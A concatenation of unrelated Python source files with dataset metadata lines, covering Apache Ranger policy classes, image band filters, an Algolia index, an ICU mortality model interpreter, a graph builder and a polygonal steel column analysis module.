class RangerRowFilterPolicyItem(RangerPolicyItem):
    """Policy item that additionally carries row-filter information.

    NOTE(review): unlike RangerDataMaskPolicyItem, a missing rowFilterInfo is
    stored as None rather than a default object -- confirm that is intended.
    """

    def __init__(self, rowFilterInfo=None, accesses=None, users=None, groups=None, roles=None, conditions=None, delegateAdmin=None):
        super().__init__(accesses, users, groups, roles, conditions, delegateAdmin)
        self.rowFilterInfo = rowFilterInfo

    def __repr__(self):
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicy(RangerBase):
    """Top-level Ranger access policy: resources plus allow/deny/mask/row-filter items."""

    def __init__(self, id=None, guid=None, createdBy=None, updatedBy=None, createTime=None, updateTime=None,
                 service=None, name=None, description=None, isEnabled=True, isAuditEnabled=None, resources=None,
                 policyItems=None, dataMaskPolicyItems=None, rowFilterPolicyItems=None, serviceType=None, options=None,
                 policyLabels=None, zoneName=None, isDenyAllElse=None, validitySchedules=None, version=None,
                 denyPolicyItems=None, denyExceptions=None, allowExceptions=None, resourceSignature=None,
                 policyType=None, policyPriority=None, conditions=None):
        # Common id/audit fields are handled by RangerBase.
        super().__init__(id, guid, createdBy, updatedBy, createTime, updateTime, version, isEnabled)
        self.service = service
        self.name = name
        self.policyType = policyType
        # 0 is the default priority when none is supplied.
        self.policyPriority = policyPriority if policyPriority is not None else 0
        self.description = description
        self.resourceSignature = resourceSignature
        self.isAuditEnabled = isAuditEnabled if isAuditEnabled is not None else True
        # Mutable defaults are created per instance via "x if x is not None else ...".
        self.resources = resources if resources is not None else {}
        self.policyItems = policyItems if policyItems is not None else []
        self.denyPolicyItems = denyPolicyItems if denyPolicyItems is not None else []
        self.allowExceptions = allowExceptions if allowExceptions is not None else []
        self.denyExceptions = denyExceptions if denyExceptions is not None else []
        self.dataMaskPolicyItems = dataMaskPolicyItems if dataMaskPolicyItems is not None else []
        self.rowFilterPolicyItems = rowFilterPolicyItems if rowFilterPolicyItems is not None else []
        self.serviceType = serviceType
        self.options = options if options is not None else {}
        self.validitySchedules = validitySchedules if validitySchedules is not None else []
        self.policyLabels = policyLabels if policyLabels is not None else []
        self.zoneName = zoneName
        self.conditions = conditions
        self.isDenyAllElse = isDenyAllElse if isDenyAllElse is not None else False

    def __repr__(self):
        # JSON view of the instance state; nested models serialize via __dict__.
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
| 2.109375 | 2 |
BandFilter.py | FullPint/Frequency-Filter-Server | 0 | 12772886 | import numpy as np
import math as math
import cv2
def get_ideal_low_pass_filter(shape, cutoff, width):
    """Build an ideal band-reject mask: 0 inside the band, 1 outside.

    NOTE: despite the name, this zeroes frequencies whose distance from the
    spectrum centre lies in [cutoff - width/2, cutoff + width/2].

    Parameters
    ----------
    shape : (h, w) tuple -- size of the mask.
    cutoff : centre radius of the rejected band.
    width : total width of the rejected band.
    """
    h, w = shape
    # Distance of every pixel from the spectrum centre, computed with
    # broadcasting instead of the original per-pixel Python loops.
    rows = np.arange(h)[:, None] - h / 2
    cols = np.arange(w)[None, :] - w / 2
    distance = np.sqrt(rows ** 2 + cols ** 2)
    in_band = (distance >= cutoff - width / 2) & (distance <= cutoff + width / 2)
    return np.where(in_band, 0.0, 1.0)
def get_ideal_high_pass_filter(shape, cutoff, width):
    """Complement of the ideal band-reject mask: 1 inside the band, 0 outside."""
    return 1 - get_ideal_low_pass_filter(shape, cutoff, width)
def get_butterworth_low_pass_filter(shape, cutoff, order, width):
    """Butterworth band-reject mask of the given order (vectorized).

    Pixels where distance**2 == cutoff**2 would make the denominator singular
    and are set to 0, matching the original loop's explicit guard.

    Parameters
    ----------
    shape : (h, w) tuple -- size of the mask.
    cutoff : centre radius of the rejected band.
    order : Butterworth order (sharpness of the transition).
    width : band width parameter.
    """
    h, w = shape
    rows = np.arange(h)[:, None] - h / 2
    cols = np.arange(w)[None, :] - w / 2
    distance = np.sqrt(rows ** 2 + cols ** 2)
    denom = distance ** 2 - cutoff ** 2
    mask_image = np.zeros((h, w))
    regular = denom != 0
    mask_image[regular] = 1 / (1 + (((distance[regular] * width) / denom[regular]) ** (2 * order)))
    return mask_image
def get_butterworth_high_pass_filter(shape, cutoff, order, width):
    """Complement of the Butterworth band-reject mask (passes the band)."""
    return 1 - get_butterworth_low_pass_filter(shape, cutoff, order, width)
def get_gaussian_low_pass_filter(shape, cutoff, width):
    """Gaussian band-reject mask (vectorized).

    The exact centre pixel (distance 0) stays 0, matching the original loop's
    explicit distance==0 guard.
    """
    h, w = shape
    rows = np.arange(h)[:, None] - h / 2
    cols = np.arange(w)[None, :] - w / 2
    distance = np.sqrt(rows ** 2 + cols ** 2)
    mask_image = np.zeros((h, w))
    nonzero = distance != 0
    ratio = (distance[nonzero] ** 2 - cutoff ** 2) / (distance[nonzero] * width)
    mask_image[nonzero] = 1 - np.exp(-(ratio ** 2))
    return mask_image
def get_gaussian_high_pass_filter(shape, cutoff, width):
    """Complement of the Gaussian band-reject mask (passes the band)."""
    return 1 - get_gaussian_low_pass_filter(shape, cutoff, width)
def post_process_image(image):
    """Linearly stretch *image* intensities to the full [0, 255] uint8 range.

    A constant image (max == min) maps to all zeros; the original code divided
    by zero in that case.
    """
    c_min = float(np.min(image))
    c_max = float(np.max(image))
    if c_max == c_min:
        # Degenerate input: no contrast to stretch.
        return np.zeros(np.shape(image), dtype=np.uint8)
    stretched = (image - c_min) * (255.0 / (c_max - c_min))
    # astype() truncates toward zero, matching the original per-element
    # assignment into a uint8 array.
    return stretched.astype(np.uint8)
def filtering_band_filter(image, cutoff, width, filtertype):
    """Apply the selected band filter to *image* in the frequency domain.

    Returns [stretched_filtered_image (uint8), log-magnitude of the filtered
    spectrum (uint8)]. An unknown *filtertype* falls back to an all-zero mask,
    which blanks the spectrum (and makes the log-magnitude image degenerate).
    """
    shape = image.shape
    spectrum = np.fft.fftshift(np.fft.fft2(image))
    if filtertype == 'Ideal Low Pass':
        mask = get_ideal_low_pass_filter(shape, cutoff, width)
    elif filtertype == 'Ideal High Pass':
        mask = get_ideal_high_pass_filter(shape, cutoff, width)
    elif filtertype == 'Gaussain Low Pass':  # (sic) keep the caller-facing spelling
        mask = get_gaussian_low_pass_filter(shape, cutoff, width)
    elif filtertype == 'Gaussian High Pass':
        mask = get_gaussian_high_pass_filter(shape, cutoff, width)
    elif filtertype == 'Butterworth Low Pass':
        # BUG FIX: the original called get_butterworth_low_pass_filter(shape,
        # cutoff, width, order=2), passing `width` positionally into the
        # `order` slot and then `order` again as a keyword -> TypeError.
        mask = get_butterworth_low_pass_filter(shape, cutoff, 2, width)
    else:
        mask = 0
    filtered = spectrum * mask
    filter_finalimg = np.uint8(np.log(np.absolute(filtered)) * 10)
    restored = np.absolute(np.fft.ifft2(np.fft.ifftshift(filtered)))
    return [post_process_image(restored), filter_finalimg]
def filtering_band_filter_order(image, cutoff, order, width, filtertype):
    """Butterworth band filtering (low or high pass) with an explicit order.

    Returns [stretched_filtered_image (uint8), log-magnitude of the filtered
    spectrum (uint8)]. Any *filtertype* other than 'Butterworth Low Pass'
    selects the high-pass variant.
    """
    shape = image.shape
    spectrum = np.fft.fftshift(np.fft.fft2(image))
    if filtertype == 'Butterworth Low Pass':
        mask = get_butterworth_low_pass_filter(shape, cutoff, order, width)
    else:
        mask = get_butterworth_high_pass_filter(shape, cutoff, order, width)
    # NOTE(review): the mask is scaled by 200 before being applied; kept for
    # identical output, but the factor looks like a visualization hack.
    filtered = spectrum * (mask * 200)
    filter_finalimg = np.uint8(np.log(np.absolute(filtered)) * 10)
    restored = np.absolute(np.fft.ifft2(np.fft.ifftshift(filtered)))
    return [post_process_image(restored), filter_finalimg]
| 2.765625 | 3 |
website/products/index.py | zckoh/ecommerce-fullstack | 1 | 12772887 | from algoliasearch_django import AlgoliaIndex
from algoliasearch_django.decorators import register
from .models import Product
@register(Product)
class ProductIndex(AlgoliaIndex):
    # Algolia search index definition for Product records; `fields` lists the
    # model attributes pushed to the search index.
    fields = ('product_name', 'model_no', 'product_category',
              'product_details', 'slug', 'main_product_image')
| 1.742188 | 2 |
iseeu/iseeu.py | overfree/ISeeU | 20 | 12772888 | <gh_stars>10-100
from keras.models import Model, load_model
import matplotlib as mpl
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import deeplift
from deeplift.layers import NonlinearMxtsMode
from deeplift.conversion import kerasapi_conversion as kc
from deeplift.util import compile_func
import pkg_resources
class ISeeU:
__version__ = "0.1.2"
_predictor_names = ['AGE', 'AIDS', 'BICARBONATE', 'BILIRRUBIN', 'BUN',
'DIASTOLIC BP', 'ELECTIVE', 'Fi02', 'GCSEyes', 'GCSMotor', 'GCSVerbal',
'HEART RATE', 'LYMPHOMA', 'METASTATIC CANCER', 'PO2', 'POTASSIUM', 'SODIUM',
'SURGICAL', 'SYSTOLIC BP', 'TEMPERATURE', 'URINE OUTPUT', 'WBC']
_mean = np.array([[6.34243460e+01],
[1.15991138e-02],
[2.35914714e+01],
[2.03752342e+00],
[2.58391275e+01],
[5.91375639e+01],
[1.42447543e-01],
[2.97559969e+01],
[3.22050524e+00],
[5.25573345e+00],
[3.22759360e+00],
[8.66774736e+01],
[3.08875277e-02],
[5.55193536e-02],
[1.25386686e+02],
[4.09971018e+00],
[1.38761390e+02],
[4.43503193e-01],
[1.20239568e+02],
[3.70007987e+01],
[1.38921403e+02],
[1.27906951e+01]])
_std = np.array([[1.57299432e+01],
[1.07079730e-01],
[4.47612455e+00],
[4.66545958e+00],
[2.08943192e+01],
[1.32289819e+01],
[3.49531348e-01],
[2.62710231e+01],
[1.10602245e+00],
[1.44245692e+00],
[1.89790566e+00],
[1.76732764e+01],
[1.73024247e-01],
[2.29006091e-01],
[6.59593339e+01],
[5.82762482e-01],
[4.62377559e+00],
[4.96830233e-01],
[2.15098339e+01],
[7.92864147e-01],
[1.72131946e+02],
[9.74428591e+00]])
_palette = plt.get_cmap('tab10')
def __init__(self):
model_file = pkg_resources.resource_filename('iseeu', 'models/kfold4_best.hdf5')
print(f"****{model_file}*****")
self._model = load_model(model_file)
dm = kc.convert_model_from_saved_files(
h5_file=model_file,
nonlinear_mxts_mode=NonlinearMxtsMode.RevealCancel, verbose=False)
self._deeplift_model = dm
input_layer_name = self._deeplift_model.get_input_layer_names()[0]
self._importance_func = self._deeplift_model.get_target_contribs_func(
find_scores_layer_name=input_layer_name, pre_activation_target_layer_name='preact_fc2_0')
def predict(self, patient_tensor):
if patient_tensor.shape != (1, 22, 48):
raise ValueError(
"Wrong tensor shape. The patient tensor shape should be (1,22,48).")
patient_tensor = np.nan_to_num((patient_tensor - self._mean)/self._std)
patient_tensor = patient_tensor[:, None]
prediction = self._model.predict(patient_tensor)
scores = np.array(
self._importance_func(task_idx=0, input_data_list=[patient_tensor],
input_references_list=[
np.zeros_like(patient_tensor)],
batch_size=1, progress_update=None))
return prediction[0][0], scores[0][0]
    def visualize_patient_scores(self, patient_tensor, importance_scores=None, cycle_colors=True, filename=None,
                                 cmap='coolwarm'):
        """Plot the 22 predictor time series of one patient, optionally shading
        each series with its DeepLIFT importance scores.

        patient_tensor : array of shape (1, 22, 48).
        importance_scores : optional array of shape (22, 48).
        cycle_colors : cycle the line palette per predictor when True.
        filename : if given, the figure is also saved at 200 dpi.
        cmap : matplotlib colormap name for the importance heatmap.
        """
        if patient_tensor.shape != (1, 22, 48):
            raise ValueError(
                "Wrong tensor shape. The patient tensor shape should be (1,22,48).")
        if importance_scores is not None and importance_scores.shape != (22, 48):
            raise ValueError(
                "Wrong tensor shape. The scores tensor shape should be (22,48).")
        patient_tensor = patient_tensor[0]
        if importance_scores is not None:
            # Centre the diverging colormap on score 0.
            norm = MidpointNormalize(vmin=importance_scores.min(
            ), vmax=importance_scores.max(), midpoint=0)
            scaled_scores = norm(importance_scores)
            heatmap_cm = cm.get_cmap(cmap)
            heatmap_colors = heatmap_cm(scaled_scores)
            colorbar_ticks = np.concatenate((np.linspace(0, importance_scores.min(), 3, endpoint=False),
                                             np.linspace(0, importance_scores.max(), 3)))
        fig, ax = plt.subplots(11, 2, sharex='col', figsize=(30, 20))
        for i, v in enumerate(self._predictor_names):
            # NOTE(review): this tuple lists 'ELECTIVE' twice and uses
            # 'METASTATIC_CANCER' (underscore) while _predictor_names has
            # 'METASTATIC CANCER' (space), so that entry never matches.
            if v in ('AIDS', 'ELECTIVE', 'METASTATIC_CANCER', 'LYMPHOMA', 'SURGICAL', 'ELECTIVE'):
                ax[int(i // 2), i % 2].set_ylim((-2, 2))
            ax[int(i // 2), i % 2].plot(range(48), patient_tensor[i],
                                        lw=2.5, color=self._palette(i % 10) if cycle_colors else self._palette(0),
                                        marker='o', markersize=6)
            ax[int(i // 2), i % 2].legend([v], loc='upper left')
            if importance_scores is not None:
                # A 3-D color array means one color per (predictor, hour) cell;
                # otherwise there is a single color per predictor.
                if len(heatmap_colors.shape) == 3:
                    for j in range(48):
                        ax[int(i // 2), i % 2].axvspan(j, j + 1,
                                                       facecolor=heatmap_colors[i, j], alpha=0.5)
                else:
                    ax[int(i // 2), i % 2].axvspan(0, 48,
                                                   facecolor=heatmap_colors[i], alpha=0.5)
        if importance_scores is not None:
            # Shared colorbar on the right edge of the figure.
            ax_cb = fig.add_axes([0.92, 0.125, 0.015, 0.755])
            cb1 = mpl.colorbar.ColorbarBase(
                ax_cb, cmap=cmap, norm=norm, ticks=colorbar_ticks, orientation='vertical')
        plt.subplots_adjust(wspace=0.05)
        if filename is not None:
            plt.savefig(filename, dpi=200, bbox_inches='tight')
        plt.show()
    def visualize_evidence(self, importance_scores, filename=None, figsize=(20, 15)):
        """Horizontal bar chart of summed negative/positive contributions per predictor.

        importance_scores : array of shape (22, 48).
        filename : if given, the figure is also saved at 200 dpi.
        """
        if importance_scores.shape != (22, 48):
            raise ValueError(
                "Wrong tensor shape. The scores tensor shape should be (22,48).")
        # NOTE(review): `norm` is computed but never used below.
        norm = np.sum(np.abs(importance_scores), axis=1)
        positive_contribs = np.sum(importance_scores.clip(min=0), axis=1)
        negative_contribs = np.sum(importance_scores.clip(max=0), axis=1)
        df = pd.DataFrame(index=self._predictor_names, data={'Negative contribution': negative_contribs,
                                                             'Positive contribution': positive_contribs})
        df.plot.barh(figsize=figsize, color=[
            self._palette(0), self._palette(3)])
        if filename is not None:
            plt.savefig(filename, dpi=200)
# set the colormap and centre the colorbar
# http://chris35wills.github.io/matplotlib_diverging_colorbar/
class MidpointNormalize(mpl.colors.Normalize):
    """Normalize values so a diverging colormap is centred on *midpoint*.

    e.g. im = ax1.imshow(array, norm=MidpointNormalize(midpoint=0., vmin=-100, vmax=100))
    (via http://chris35wills.github.io/matplotlib_diverging_colorbar/)
    """

    def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
        self.midpoint = midpoint
        mpl.colors.Normalize.__init__(self, vmin, vmax, clip)

    def __call__(self, value, clip=None):
        # Piecewise-linear map: vmin -> 0, midpoint -> 0.5, vmax -> 1; NaNs masked.
        anchors_x = [self.vmin, self.midpoint, self.vmax]
        anchors_y = [0, 0.5, 1]
        return np.ma.masked_array(np.interp(value, anchors_x, anchors_y), np.isnan(value))
| 1.835938 | 2 |
dataset.py | Westerley/framework_event2vec | 1 | 12772889 | <reponame>Westerley/framework_event2vec
import pandas as pd
import networkx as nx
import argparse
def parse_args(argv=None):
    """Parse command-line options for the graph-builder script.

    Parameters
    ----------
    argv : list[str] or None
        Argument list to parse; None (the default) keeps the original
        behaviour of reading sys.argv[1:].
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--edges', type=str, help='input csv file')
    parser.add_argument('--sep', type=str, default='\t')
    parser.add_argument('--output', type=str)
    return parser.parse_args(argv)
def get_node(node):
    """Return the node id (text before the first ':') of a 'name:type' token."""
    head, _sep, _rest = node.strip().partition(':')
    return head
def get_type(node):
    """Return the type label (second ':'-separated field) of a 'name:type' token."""
    fields = node.strip().split(':')
    return fields[1]
def main(args):
    """Build an undirected weighted graph from the edge CSV and pickle it.

    Node tokens in the CSV look like 'name:type'; the type is split off into
    a node attribute before edges are added.
    """
    edges = pd.read_csv(args.edges, sep=args.sep, names=['node1', 'node2', 'weight'])
    # Extract types first -- get_node() below overwrites the raw token columns.
    edges['type1'] = edges['node1'].apply(get_type)
    edges['node1'] = edges['node1'].apply(get_node)
    edges['type2'] = edges['node2'].apply(get_type)
    edges['node2'] = edges['node2'].apply(get_node)
    G = nx.Graph()
    for _, row in edges.iterrows():
        G.add_edge(row['node1'], row['node2'], weight=row['weight'])
    for _, row in edges.iterrows():
        G.nodes[row['node1']]['type'] = row['type1']
        G.nodes[row['node2']]['type'] = row['type2']
    nx.write_gpickle(G, 'datasets/%s' % args.output)
if __name__ == "__main__":
    args = parse_args()
    # NOTE(review): debug print of the separator; consider removing.
    print(args.sep)
    main(args)
| 2.75 | 3 |
libaarhusxyz/__init__.py | emerald-geomodelling/libaarhusxyz | 0 | 12772890 | <filename>libaarhusxyz/__init__.py
from .xyz import parse
from .xyz import dump
from .sr2 import parse as parse_sr2
from .gex import parse as parse_gex
| 1.03125 | 1 |
PySS/polygonal.py | manpan-1/steel_toolbox | 2 | 12772891 | <reponame>manpan-1/steel_toolbox
# -*- coding: utf-8 -*-
"""
A framework for the study of polygonal profiles.
"""
import os
import numpy as np
import PySS.steel_design as sd
import PySS.lab_tests as lt
import PySS.analytic_geometry as ag
import PySS.scan_3D as s3d
import pickle
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
class PolygonalColumn:
    """
    Polygonal column.

    Aggregates the three representations of a single physical specimen: the
    idealised geometry with resistance calculations (``theoretical_specimen``),
    the 3D-scanned shape (``real_specimen``) and the compression-test
    measurements (``experiment_data``).
    """

    def __init__(self, name=None, theoretical_specimen=None, real_specimen=None, experiment_data=None):
        self.name = name
        self.theoretical_specimen = theoretical_specimen
        self.real_specimen = real_specimen
        self.experiment_data = experiment_data

    def add_theoretical_specimen(self,
                                 n_sides,
                                 length,
                                 f_yield,
                                 fab_class,
                                 r_circle=None,
                                 p_class=None,
                                 thickness=None
                                 ):
        """
        Create the theoretical (ideal geometry) specimen for this column.

        Exactly two of the three optional arguments {r_circle, p_class,
        thickness} must be given; the appropriate ``TheoreticalSpecimen``
        constructor is chosen based on which one is missing.

        Parameters
        ----------
        n_sides : int
            Number of sides of the polygon cross-section.
        length : float
            Length of the column.
        f_yield : float
            Yield stress of the material.
        fab_class : {'fcA', 'fcB', 'fcC'}
            Fabrication class, passed through to the shell resistance
            calculation.
        r_circle : float, optional
            Radius of the equal-perimeter circle.
        p_class : float, optional
            Facet slenderness, c/(epsilon*t).
        thickness : float, optional
            Thickness of the cross-section.
        """
        # More than one missing optional argument -> the geometry is
        # under-determined.
        if [i is None for i in [r_circle, p_class, thickness]].count(True) > 1:
            print('Not enough info. Two out of the three optional arguments {r_circle, p_class, thickness}'
                  ' must be given.')
            return
        else:
            # Dispatch to the constructor matching the given pair of values.
            if p_class is None:
                self.theoretical_specimen = TheoreticalSpecimen.from_geometry(
                    n_sides,
                    r_circle,
                    thickness,
                    length,
                    f_yield,
                    fab_class
                )
            elif r_circle is None:
                self.theoretical_specimen = TheoreticalSpecimen.from_slenderness_and_thickness(
                    n_sides,
                    p_class,
                    thickness,
                    length,
                    f_yield,
                    fab_class
                )
            else:
                self.theoretical_specimen = TheoreticalSpecimen.from_slenderness_and_radius(
                    n_sides,
                    r_circle,
                    p_class,
                    length,
                    f_yield,
                    fab_class
                )

    def add_real_specimen(self, path):
        """
        Add data from scanning pickle file.

        Adds a self.specimen object of the RealSpecimen class. Scanned data are loaded from a list of pickle files
        corresponding to sides and edges, each file containing point coordinates. The pickle files are assumed to follow
        the the filename structure:
        files with points of sides: `side_XX.pkl`
        files with points of edges: `edge_XX.pkl`
        where `XX` is an ascending number starting from 01.

        Parameters
        ----------
        path : str
            Path containing side_XX.pkl and edge_XX.pkl files. eg `/home/user/` (terminating backslash required).
        """
        # Scan the given path for filenames.
        file_list = os.listdir(path)
        n_sides, n_edges = 0, 0
        side_filename_numbers, edge_filename_numbers = [], []
        for fname in file_list:
            if fname[-4:] == '.pkl':
                if fname[:5] == 'side_':
                    n_sides = n_sides + 1
                    side_filename_numbers.append(int(fname[5:7]))
                if fname[:5] == 'edge_':
                    n_edges = n_edges + 1
                    edge_filename_numbers.append(int(fname[5:7]))

        if n_sides == 0 and n_edges == 0:
            print('No side or edge files were found in the directory.')
            return NotImplemented

        # Sort the numbers fetched from the filenames and check if they are sequential or if there are numbers missing.
        side_filename_numbers.sort()
        edge_filename_numbers.sort()
        # BUGFIX: this used `and`, which reported a problem only when BOTH
        # sequences were broken. A gap in either the side files or the edge
        # files invalidates the numbering (the error text itself says
        # "no sides or edges missing"), so `or` is required.
        if (not all([x == num - 1 for x, num in enumerate(side_filename_numbers)]) or
                not all([x == num - 1 for x, num in enumerate(edge_filename_numbers)])):
            print("Problem with filenames. Check if the filenames are correct (see method's documentation) ant the "
                  "numbering in the filenames is sequential (no sides or edges missing)")
            return NotImplemented

        # Create a polygon specimen object. The theoretical specimen must
        # already exist because its thickness drives the midline offsets.
        if self.theoretical_specimen is None:
            print('No theoretical specimen defined. Before adding data of the real scanned specimen, it is necessary '
                  'to create the corresponding theoretical specimen.')
            return
        else:
            specimen = RealSpecimen(thickness=self.theoretical_specimen.geometry.thickness)

        # Add a center line for the specimen.
        # TODO: add real centreline from file.
        print('Adding centre-line from pickle.')
        specimen.centre_line_from_pickle('./' + path + 'centreline.pkl')

        # Add all sides and edges.
        # they consist of FlatFace and RoundedEdge instances.
        specimen.add_all_sides(n_sides, path + 'side_', fit_planes=True, offset_to_midline=True)

        # Check if the existing edges found in the directory correspond one by one to the sides. If so, then the
        # intersection lines of adjacent sides are calculated and added to the edges as reference lines. Otherwise, the
        # edges are imported from whatever files are found and no reference lines are calculated.
        if side_filename_numbers == edge_filename_numbers:
            intrsct_lines = True
        else:
            intrsct_lines = False

        specimen.add_all_edges(n_edges, path + 'edge_', intrsct_lines=intrsct_lines)

        # Find a series of points for each edge based on the scanned surface.
        specimen.find_real_edges(offset_to_midline=True, ref_lines=True)

        # Calculate the initial imperfection displacements based on the edge and facet reference line and plane
        # accordingly.
        specimen.find_edge_imperfection_displacements()
        specimen.find_facet_imperfection_displacements()

        # Assign the constructed specimen to the object
        self.real_specimen = specimen

    def add_experiment(self, fh):
        """
        Add and post-process data from a test.

        Parameters
        ----------
        fh : str
            Path to the experiment data file, loaded through
            ``TestData.from_file``.
        """
        self.experiment_data = TestData.from_file(fh)
        # Geometry from the theoretical specimen is needed to convert raw
        # channels to strain/stress.
        self.experiment_data.specimen_length = self.theoretical_specimen.geometry.length
        self.experiment_data.cs_area = self.theoretical_specimen.cs_props.area
        self.experiment_data.process_data()

    def report_real_specimen(self):
        """Print a report for the processed scanned data of the real specimen."""
        print('Report for {}'.format(self.name))
        self.real_specimen.print_report()
class TheoreticalSpecimen(sd.Part):
    """
    Properties and calculations of a theoretical (ideal geometry) polygonal column.

    Thin wrapper around ``sd.Part`` with alternate constructors that derive
    the full geometry/resistance data from different input combinations.
    """

    def __init__(self,
                 geometry=None,
                 cs_props=None,
                 material=None,
                 struct_props=None,
                 bc_loads=None):
        super().__init__(
            geometry,
            cs_props,
            material,
            struct_props,
            bc_loads)

    @classmethod
    def from_geometry(
            cls,
            n_sides,
            r_circle,
            thickness,
            length,
            f_yield,
            fab_class
    ):
        """
        Create theoretical polygonal column object for given geometric data.

        The constructor calculates properties of the polygonal column object (cross-section props,
        resistance, geometric props etc). The calculated data is then used to construct an object.

        Parameters
        ----------
        n_sides : int
            Number of sides of the polygon cross-section.
        r_circle : float
            Radius of the circle whose perimeter equals that of the polygon
            (the "equal-perimeter" cylinder; see the r_circum conversion below).
        thickness : float
            Thickness of the cross-section.
        length : float
            Length of the column.
        f_yield : float
            Yield stress of the material.
        fab_class : {'fcA', 'fcB', 'fcC'}
            Fabrication class, as described in EN 1993-1-6. It is used in the calculation of the buckling resistance of
            the cylinder of equal thickness-perimeter.
        """
        # Create material (E = 210 GPa, nu = 0.3).
        material = sd.Material(210000, 0.3, f_yield)
        epsilon = np.sqrt(235. / f_yield)

        # Radius of the polygon's circumscribed circle, chosen so the polygon
        # perimeter equals the perimeter of the circle of radius r_circle.
        r_circum = (np.pi * r_circle) / (n_sides * np.sin(np.pi / n_sides))

        # Diameter
        diam_circum = 2 * r_circum

        # Central angles
        theta = 2 * np.pi / n_sides

        # Width of each side
        side_width = diam_circum * np.sin(np.pi / n_sides)

        # Polar coordinate of the polygon vertices on the cross-section plane
        phii = []
        for i_index in range(n_sides):
            phii.append(i_index * theta)

        # Polygon corners coordinates.
        x_corners = tuple(r_circum * np.cos(phii))
        y_corners = tuple(r_circum * np.sin(phii))

        # Cross-sectional properties: node list plus element connectivity
        # (each side closes back to node 0, constant thickness).
        nodes = [x_corners, y_corners]
        elem = [
            list(range(0, len(x_corners))),
            list(range(1, len(x_corners))) + [0],
            len(x_corners) * [thickness]
        ]

        cs_sketch = sd.CsSketch(nodes, elem)
        geometry = sd.Geometry(cs_sketch, length, thickness)

        cs_props = sd.CsProps.from_cs_sketch(cs_sketch)
        # Extreme fibre distances: corner radius and apothem.
        cs_props.max_dist = r_circum
        cs_props.min_dist = np.sqrt(r_circum ** 2 - (side_width / 2) ** 2)

        # Flexural buckling slenderness about both principal axes
        # (pinned-pinned, kapa_bc = 1).
        lmbda_y = sd.lmbda_flex(
            length,
            cs_props.area,
            cs_props.moi_1,
            kapa_bc=1.,
            e_modulus=material.e_modulus,
            f_yield=material.f_yield
        )

        lmbda_z = sd.lmbda_flex(
            length,
            cs_props.area,
            cs_props.moi_2,
            kapa_bc=1.,
            e_modulus=material.e_modulus,
            f_yield=material.f_yield
        )

        # Axial compression resistance , Npl
        n_pl_rd = n_sides * sd.n_pl_rd(thickness, side_width, f_yield)

        # Compression resistance of equivalent cylindrical shell
        n_b_rd_shell = 2 * np.pi * r_circle * thickness * sd.sigma_x_rd(
            thickness,
            r_circle,
            length,
            f_yield,
            fab_quality=fab_class,
            gamma_m1=1.
        )

        # Plate classification acc. to EC3-1-1
        p_classification = side_width / (epsilon * thickness)

        # Tube classification slenderness acc. to EC3-1-1
        t_classification = 2 * r_circle / (epsilon ** 2 * thickness)

        struct_props = sd.StructProps(
            t_classification=t_classification,
            p_classification=p_classification,
            lmbda_y=lmbda_y,
            lmbda_z=lmbda_z,
            n_pl_rd=n_pl_rd,
            n_b_rd_shell=n_b_rd_shell
        )

        geometry.r_circle = r_circle

        return cls(geometry, cs_props, material, struct_props)

    @classmethod
    def from_slenderness_and_thickness(
            cls,
            n_sides,
            p_classification,
            thickness,
            length,
            f_yield,
            fab_class
    ):
        """
        Create theoretical polygonal column object for given number of sides and cross-section slenderness.

        The constructor calculates properties of the polygonal column object (cross-section props,
        resistance, geometric props etc) which are then used to construct an object.

        Parameters
        ----------
        n_sides : int
            Number of sides of the polygon cross-section.
        p_classification : float
            Facet slenderness, c/(ε*t).
        thickness : float
            Thickness of the cross-section.
        length : float
            Length of the column.
        f_yield : float
            Yield stress of the material.
        fab_class : {'fcA', 'fcB', 'fcC'}
            Fabrication class, as described in EN 1993-1-6. It is used in the calculation of the buckling resistance of
            the cylinder of equal thickness-perimeter.
        """
        # Epsilon for the material
        epsilon = np.sqrt(235. / f_yield)

        # Radius of the equal perimeter cylinder: the polygon perimeter is
        # n_sides * side_width with side_width = epsilon * t * p_class.
        r_circle = n_sides * thickness * epsilon * p_classification / (2 * np.pi)

        return cls.from_geometry(
            n_sides,
            r_circle,
            thickness,
            length,
            f_yield,
            fab_class
        )

    @classmethod
    def from_slenderness_and_radius(
            cls,
            n_sides,
            r_circle,
            p_classification,
            length,
            f_yield,
            fab_class
    ):
        """
        Create theoretical polygonal column object for given geometric data.

        The constructor calculates properties of the polygonal column object (cross-section props,
        resistance, geometric props etc). The calculated data is then used to construct an object.

        Parameters
        ----------
        n_sides : int
            Number of sides of the polygon cross-section.
        r_circle : float
            Radius of the circle with perimeter equal to that of the polygon
            (equal-perimeter cylinder).
        p_classification : float
            Facet slenderness, c/(ε*t).
        length : float
            Length of the column.
        f_yield : float
            Yield stress of the material.
        fab_class : {'fcA', 'fcB', 'fcC'}
            Fabrication class, as described in EN 1993-1-6. It is used in the calculation of the buckling resistance of
            the cylinder of equal thickness-perimeter.
        """
        # Epsilon for the material
        epsilon = np.sqrt(235. / f_yield)

        # Calculate the thickness (inverse of the relation used in
        # `from_slenderness_and_thickness`).
        thickness = 2 * np.pi * r_circle / (n_sides * epsilon * p_classification)

        return cls.from_geometry(
            n_sides,
            r_circle,
            thickness,
            length,
            f_yield,
            fab_class
        )
class RealSpecimen:
    """
    A column specimen of polygonal cross-section.

    Used for the scanned polygonal specimens. Sides are `s3d.FlatFace`
    instances, edges are `s3d.RoundedEdge` instances and the centre line is
    an `ag.Line3D`.
    """

    def __init__(self, sides=None, edges=None, centre_line=None, thickness=None):
        # Avoid mutable default arguments: fresh lists per instance.
        if sides is None:
            sides = []
        if edges is None:
            edges = []
        self.sides = sides
        self.edges = edges
        self.centre_line = centre_line
        # Plate thickness; used for offsetting points/planes to the midline.
        self.thickness = thickness

    def centre_line_from_pickle(self, fh):
        """
        Import a centre-line to the polygonal object from a pickle file.

        The pickle file is expected to contain a list of 2 points from which the line is constructed. This method is
        used in combination with the equivalent `export` method from blender.

        Parameters
        ----------
        fh : str
            Path and filename of the pickle file.
        """
        self.centre_line = ag.Line3D.from_pickle(fh)

    def add_single_side_from_pickle(self, filename):
        """
        Create a FlatFace instance as one side af the polygon column.

        The FlatFace instance is created from a pickle file of scanned data points.

        :param filename:
        :return:
        """
        self.sides.append(s3d.FlatFace.from_pickle(filename))
